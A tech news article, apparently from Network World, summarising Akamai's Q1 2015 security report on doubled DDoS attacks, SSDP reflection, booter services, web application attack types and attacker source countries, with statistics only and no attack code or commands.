Microsoft Subnet An independent Microsoft community View more

Akamai report: DDoS attacks doubled in Q1 2015, SSDP top attack vector

Akamai Technologies published its 2015 State of the Internet Security report, which says DDoS attacks have more than doubled in the first quarter of 2015.

The number of distributed denial-of-service (DDoS) attacks in first quarter of 2015 more than doubled the number of DDoS attacks in Q1 of 2014, according to Akamai Technologies' Q1 2015 State of the Internet Security report.

8 mega DDoS attacks in first quarter of 2015

Eight mega attacks were launched against Akamai customers, with the largest measuring almost 170 Gbps. "The significant increase in potential peak attack traffic suggests attackers have been developing new ways to maximize impact," Akamai said. "As more advanced, potent tools become available, unskilled adversaries could become capable of much more damaging assaults." Furthermore, with the adoption of IPv6, attacks may create a larger and potentially more effective DDoS attack surface.

Although there were mega-attacks, the attack mindset has changed with the average DDoS attack using less bandwidth but lasting 24 hours or more.

The gaming industry was again hit with the largest share of attacks, as five of those mega attacks "listed as Internet & Telecom were actually targeting gaming sites hosted on the customer network." All but one contained SYN floods. Gaming has been the most targeted industry since Q2 2014; the software and technology industry was next, followed by the Internet and telecom industry. Akamai noted, "Infrastructure attacks increased 125% year over year, making up 91% of total DDoS attacks."

DDoS attack most targeted industries

DDoS attack vectors have changed as exploiting the Simple Service Discovery Protocol (SSDP) has become the top attack vector; SSDP attacks "represented the top overall infrastructure-based attack, bypassing SYN floods, which was the top attack vector in Q4 2014."

There's no shortage of devices with the SSDP protocol as it "comes enabled on millions of home and office devices—including routers, media servers, web cams, smart TVs and printers—to allow them to discover each other on a network, establish communication and coordinate activities." Akamai said, "Not only is this attack easy for malicious actors to execute, but the number of vulnerable reflectors does not appear to be diminishing." Attackers are armed with a list of vulnerable devices and use them as reflectors to amplify a DDoS attack.

DDoS attack type in Q1 2015

Listed under the "attack spotlight" for Q1 2015, Akamai said, "attacks targeting an Akamai property were traced to a group of DDoS attack services found in the DDoS-for-hire market. These booter/stresser sites appear to make use of shared attack scripts found in underground forums. Booters evolved in the multi-player online game world, as DDoS attacks aimed at evicting, or booting, a player from a site. Malicious actors have made these attacks available for sale."

Last year, peak attack traffic from booter/stressor sties was about 10-20 Gbps. But now the attack sites are "more dangerous, capable of launching attacks in excess of 100 Gbps. With new reflection attack methods being added continually, such as SSDP, the potential damage from these is expected to continue increasing over time."

Top booter attack vectors in Q1 2015

Web app attacks

Akamai focused its analysis on seven common web application attack vectors: SQL injection (SQLi), local file inclusion (LFI), remote file inclusion (RFI), PHP injection (PHPi), command injection (CMDi), Java injection (JAVAi) abusing Object Graph Navigation Language (OGNL), and malicious file upload (MFU). Together they accounted for 178.85 million web app attacks.

Among the application attacks Akamai analyzed for the Q1 2015 report, "163.62 million were sent over (unencrypted) http. This represented 91.48% of the application attacks." There were 15.23 million attacks over HTTPS, with LFI being the top attack vector at 71.54%, followed by SQLi at 24.20%.

Attacker source countries

At 23.45%, China was again the top source country for DDoS attacks; Germany was responsible for 17.39% and the U.S. for 12.18%. "Combined, China, Germany and the U.S. accounted for more than 50% of attacking IPs in this quarter," Akamai wrote.

Top source countries for DDoS attacks in Q1 2015

Yet when it comes to the top countries responsible for web app attacks, the U.S. was the top source country of attacking IPs at 52.42%, followed by China (11.39%), Brazil (6.09%) and India (5.33%).

Top 10 countries behind web app attacks

It might then come as no surprise that the U.S. was also the most targeted for web app attacks with a whopping 81.61% in Q1 2015.

Top 10 target countries for web app attacks

You can grab a copy of Akamai's always interesting report here.

To comment on this article and other Network World content, visit our Facebook page or our Twitter stream.
Must read: Hidden Cause of Slow Internet and how to fix it
Notice to our Readers
We're now using social media to take your comments and feedback. Learn more about this here.